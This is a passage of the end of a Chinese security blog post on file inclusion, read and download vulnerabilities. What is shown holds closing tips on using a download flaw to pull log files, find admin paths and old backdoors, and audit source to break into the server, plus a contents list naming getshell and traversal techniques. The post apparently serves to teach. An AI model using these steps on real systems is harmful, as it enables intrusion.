<li>下载各种<code>.log</code>文件，从中寻找一些后台地址，文件上传点之类的地方，如果运气好的话会获得一些前辈们的后门。</li>
<li>下载web业务文件进行白盒审计，利用漏洞进一步攻入服务器。</li>
</ul>
</blockquote>
<p>总的来说，所有与前端交互的数据都是不安全的，不能掉以轻心！                    </p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43625917/article/details/102617154?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161857960316780274147367%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=161857960316780274147367&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_v2~rank_v29-2-102617154.pc_search_result_no_baidu_js&utm_term=%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%EF%BC%8C%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187">参考</a></p>

      
    </div>
    <footer class="article-footer">
      
        <div id="donation_div"></div>


<script src="/js/vdonate.js"></script>

<script>
var a = new Donate({
  title: '如果觉得我的文章对您有用，请随意打赏。您的支持将鼓励我继续创作!', // 可选参数，打赏标题
  btnText: 'Donate', // 可选参数，打赏按钮文字
  el: document.getElementById('donation_div'),
  wechatImage: 'https://i.loli.net/2021/07/09/UNXc5a6nbWxgzru.png',
  alipayImage: 'https://i.loli.net/2021/07/09/Sf9nJd8hkOypTar.png'
});
</script>
      
      
      <div>
        <ul class="post-copyright">
          <li class="post-copyright-author">
          <strong>Post author:  </strong>xizhi-future</a>
          </li>
          <li class="post-copyright-link">
          <strong>Post link:  </strong>
          <a href="/2021/06/06/文件包含、读取、下载漏洞/" target="_blank" title="文件包含、读取、下载漏洞">https://xizhi-future.github.io/2021/06/06/文件包含、读取、下载漏洞/</a>
          </li>
          <li class="post-copyright-license">
            <strong>Copyright Notice:   </strong>
            All articles in this blog are licensed under <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">CC BY-NC-ND 4.0</a>
            unless stating additionally.
          </li>
         
        </ul>
<div>

      
      
        
	<div id="comment">
		<!-- 来必力City版安装代码 -->
		<div id="lv-container" data-id="city" data-uid="MTAyMC8yOTQ4MS82MDQ5">
		<script type="text/javascript">
		   (function(d, s) {
		       var j, e = d.getElementsByTagName(s)[0];

		       if (typeof LivereTower === 'function') { return; }

		       j = d.createElement(s);
		       j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
		       j.async = true;

		       e.parentNode.insertBefore(j, e);
		   })(document, 'script');
		</script>
		<noscript>为正常使用来必力评论功能请激活JavaScript</noscript>
		</div>
		<!-- City版安装代码已完成 -->
	</div>



      
      
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web/" rel="tag">Web</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag">漏洞</a></li></ul>

      

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/06/24/NUCTF/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          NUCTF
        
      </div>
    </a>
  
  
    <a href="/2021/06/06/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">文件上传漏洞</div>
    </a>
  
</nav>

  
</article>

<!-- Table of Contents -->

  <aside id="toc-sidebar">
    <div id="toc" class="toc-article">
    <strong class="toc-title">Contents</strong>
    
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E2%80%93%E6%96%87%E4%BB%B6%E8%A2%AB%E8%A7%A3%E6%9E%90"><span class="nav-number">1.</span> <span class="nav-text">一、文件包含漏洞–文件被解析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%BC%8F%E6%B4%9E%E8%AF%B4%E6%98%8E"><span class="nav-number">1.1.</span> <span class="nav-text">1. 漏洞说明</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-%E6%97%A0%E8%A7%86%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%90%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="nav-number">1.1.1.</span> <span class="nav-text">1.1 无视文件扩展名读取文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-%E6%97%A0%E6%9D%A1%E4%BB%B6%E8%A7%A3%E6%9E%90PHP%E4%BB%A3%E7%A0%81"><span class="nav-number">1.1.2.</span> <span class="nav-text">1.2 无条件解析PHP代码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-%E7%A9%BA%E5%AD%97%E7%AC%A6%E5%AE%89%E5%85%A8%E7%BB%95%E8%BF%87%E2%80%9300%E6%88%AA%E6%96%AD"><span class="nav-number">1.1.3.</span> <span class="nav-text">1.3 空字符安全绕过–00截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-4-%E9%95%BF%E5%BA%A6%E6%88%AA%E6%96%AD"><span class="nav-number">1.1.4.</span> <span class="nav-text">1.4 长度截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-5-%E9%97%AE%E5%8F%B7-20-23-%E6%88%AA%E6%96%AD"><span class="nav-number">1.1.5.</span> <span class="nav-text">1.5 问号,%20,%23 截断</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.2.</span> <span class="nav-text">2. 漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1%E8%AF%BB%E5%8F%96%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.1.</span> <span class="nav-text">2.1读取敏感文件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-1-1-%E5%B8%B8%E8%A7%81%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E8%B7%AF%E5%BE%84"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">2.1.1 常见敏感信息路径</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-%E5%8C%85%E5%90%AB%E5%9B%BE%E7%89%87%E6%9C%A8%E9%A9%AC"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.2 包含图片木马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-%E5%8C%85%E5%90%AB%E6%9C%A8%E9%A9%AC%E5%86%99-shell"><span class="nav-number">1.2.3.</span> <span class="nav-text">2.3 包含木马写 shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-4-PHP-%E5%B0%81%E8%A3%85%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.2.4.</span> <span class="nav-text">2.4 PHP 封装协议</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-4-1-%E8%AE%BF%E9%97%AE%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.4.1.</span> <span class="nav-text">2.4.1 访问本地文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-4-2-%E8%AF%BB%E5%8F%96PHP%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.4.2.</span> <span class="nav-text">2.4.2 读取PHP文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-4-3-%E6%89%A7%E8%A1%8CPHP%E5%91%BD%E4%BB%A4"><span class="nav-number">1.2.4.3.</span> <span class="nav-text">2.4.3 执行PHP命令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-5-%E5%8C%85%E5%90%AB%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.5.</span> <span class="nav-text">2.5 包含日志文件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-5-1-Apache-%E9%94%99%E8%AF%AF%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6-getshell"><span class="nav-number">1.2.5.1.</span> <span class="nav-text">2.5.1 Apache 错误日志文件 getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-5-2-session-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">1.2.5.2.</span> <span class="nav-text">2.5.2 session 文件包含</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-6-%E4%BB%BB%E6%84%8F%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="nav-number">1.2.6.</span> <span class="nav-text">2.6 任意目录遍历 ..&#x2F;..&#x2F;</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E6%BC%8F%E6%B4%9E%E9%98%B2%E5%BE%A1"><span class="nav-number">1.3.</span> <span class="nav-text">3. 漏洞防御</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E2%80%93%E6%98%BE%E7%A4%BA%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="nav-number">2.</span> <span class="nav-text">二、文件读取漏洞–显示源代码</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-%E7%99%BE%E5%BA%A6%E6%9D%AF2017%E4%BA%8C%E6%9C%88-Zone%E7%9C%9F%E9%A2%98%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 百度杯2017二月-Zone真题复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-%E5%B0%8F%E7%B1%B3%E8%B7%AF%E7%94%B1%E5%99%A8%E8%BF%9C%E7%A8%8B%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="nav-number">2.2.</span> <span class="nav-text">2.2 小米路由器远程任意文件读取</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E%E2%80%93%E6%96%87%E4%BB%B6%E8%A2%AB%E4%B8%8B%E8%BD%BD"><span class="nav-number">3.</span> <span class="nav-text">三、文件下载漏洞–文件被下载</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-Pikachu-%E4%B9%8B-Insafe-Filedownload-%E2%80%94-%E5%8F%82%E6%95%B0%E5%80%BC-filename"><span class="nav-number">3.1.</span> <span class="nav-text">3.1 Pikachu 之 Insafe Filedownload — 参数值--?filename&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-znds-%E7%BD%91%E7%AB%99-%E2%80%93-%E5%8A%9F%E8%83%BD%E7%82%B9"><span class="nav-number">3.2.</span> <span class="nav-text">3.2 znds 网站 – 功能点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-3-RoarCTF2019-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E7%9C%9F%E9%A2%98%E5%A4%8D%E7%8E%B0-%E2%80%93-JAVAWEB"><span class="nav-number">3.3.</span> <span class="nav-text">3.3 RoarCTF2019-文件读取真题复现 – JAVAWEB</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">四、总结</span></a></li></ol>
    
    </div>
  </aside>

</section>
        
      </div>
      
      <footer id="footer">
  

  <div class="container">
      	<div class="row">
	      <p> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/iTimeTraveler/hexo-theme-hiker" target="_blank">Hexo-theme-hiker</a> </p>
	      <p id="copyRightEn">Copyright &copy; 2013 - 2021 忆 执 昔 来 的 旅 途 All Rights Reserved.</p>
	      
	      
    		<p class="busuanzi_uv">
				UV : <span id="busuanzi_value_site_uv"></span> |  
				PV : <span id="busuanzi_value_site_pv"></span>
		    </p>
  		   
		</div>

		
  </div>
</footer>


<!-- min height -->

<script>
    var wrapdiv = document.getElementById("wrap");
    var contentdiv = document.getElementById("content");
    var allheader = document.getElementById("allheader");

    wrapdiv.style.minHeight = document.body.offsetHeight + "px";
    if (allheader != null) {
      contentdiv.style.minHeight = document.body.offsetHeight - allheader.offsetHeight - document.getElementById("footer").offsetHeight + "px";
    } else {
      contentdiv.style.minHeight = document.body.offsetHeight - document.getElementById("footer").offsetHeight + "px";
    }
</script>
    </div>
    <!-- <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/categories" class="mobile-nav-link">Categories</a>
  
    <a href="/tags" class="mobile-nav-link">Tags</a>
  
    <a href="/friendly-links" class="mobile-nav-link">Friendly-links</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
</nav> -->
    

<!-- mathjax config similar to math.stackexchange -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true
    }
  });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/scripts.js"></script>





  
<script src="/js/dialog.js"></script>









	<div style="display: none;">
    <script src="https://s95.cnzz.com/z_stat.php?id=1260716016&web_id=1260716016" language="JavaScript"></script>
  </div>



	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
	</script>






  </div>

  <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" style="display: none;">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h2 class="modal-title" id="myModalLabel">设置</h2>
      </div>
      <hr style="margin-top:0px; margin-bottom:0px; width:80%; border-top: 3px solid #000;">
      <hr style="margin-top:2px; margin-bottom:0px; width:80%; border-top: 1px solid #000;">


      <div class="modal-body">
          <div style="margin:6px;">
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseOne" onclick="javascript:setFontSize();" aria-expanded="true" aria-controls="collapseOne">
              正文字号大小
            </a>
          </div>
          <div id="collapseOne" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingOne">
          <div class="panel-body">
            您已调整页面字体大小
          </div>
        </div>
      


          <div style="margin:6px;">
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseTwo" onclick="javascript:setBackground();" aria-expanded="true" aria-controls="collapseTwo">
              夜间护眼模式
            </a>
        </div>
          <div id="collapseTwo" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingTwo">
          <div class="panel-body">
            夜间模式已经开启，再次单击按钮即可关闭 
          </div>
        </div>

        <div>
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseThree" aria-expanded="true" aria-controls="collapseThree">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;关 于&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>
        </div>
         <div id="collapseThree" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingThree">
          <div class="panel-body">
            忆 执 昔 来 的 旅 途
          </div>
          <div class="panel-body">
            Copyright © 2021 xizhi-future All Rights Reserved.
          </div>
        </div>
      </div>


      <hr style="margin-top:0px; margin-bottom:0px; width:80%; border-top: 1px solid #000;">
      <hr style="margin-top:2px; margin-bottom:0px; width:80%; border-top: 3px solid #000;">
      <div class="modal-footer">
        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
      </div>
    </div>
  </div>
</div>
  
  <a id="rocket" href="#top" class=""></a>
  <script type="text/javascript" src="/js/totop.js?v=1.0.0" async=""></script>
  
    <a id="menu-switch"><i class="fa fa-bars fa-lg"></i></a>
  
</body>
</html>